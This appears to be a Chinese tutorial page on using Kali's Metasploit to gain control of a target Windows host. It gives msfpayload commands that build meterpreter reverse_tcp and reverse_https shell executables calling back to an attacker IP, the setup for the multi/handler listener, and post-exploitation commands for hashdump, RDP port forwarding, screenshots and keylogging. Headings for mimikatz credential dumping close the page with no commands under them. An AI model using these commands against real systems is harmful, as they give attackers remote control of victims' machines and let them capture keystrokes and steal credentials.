首页 > 代码库 > kali生成shell监听目标主机

kali生成shell监听目标主机

生成监听用的shell.exe:

reverse_tcp(反向连接)

path : payload/windows/meterpreter/reverse_tcp

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

 

reverse_http/https(反向连接)

path:payload/windows/meterpreter/reverse_http/https

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

通过http/https的方式反向连接,在网速慢的情况下不稳定,在某博客上看到https如果反弹没有收到数据,可以将监听端口换成443试试。

 

bind_tcp(正向连接)

path : payload/windows/meterpreter/bind_tcp

正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。

 

 

利用shell.exe监听:

msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.2msf exploit(handler) > set LPORT 8080msf exploit(handler) > exploit -jmsf exploit(handler) >sessions

 

基本命令:

enter image description here

常用命令:

background:将当前会话放置后台load/use:加载模块Interact:切换进一个信道migrate:迁移进程run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。Resource:执行一个已有的rc脚本。

写入文件夹:
meterpreter > pwdmeterpreter > cd C:\meterpreter > pwdmeterpreter > mkdir Hacked by AutoRootmeterpreter > ls

 

写入内容:

edit + 文件,调用vi编辑。

 

网络相关:

网络命令则有列出ip信息(ipconfig),展示修改路由表(route),还有端口转发(portfwd)

meterpreter > portfwdmeterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2

在建立规则之后就可以连接本地1314端口,这样远程的3389端口就转发出来了

 

键盘监听:

meterpreter > screenshotmeterpreter > keyscan_startmeterpreter > keyscan_dump

注意一下windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。会话0代表控制台,1,2 代表远程桌面。所以要截获键盘输入必须在0中进行。可 以使用getdesktop查看或者截张图试试。否则使用setdesktop切换。

如果不行就切换到explorer.exe进程中,这样也可以监听到远程桌面连接进来之后的键盘输入数据。

 

mimikatz:

抓取明文




 

kali生成shell监听目标主机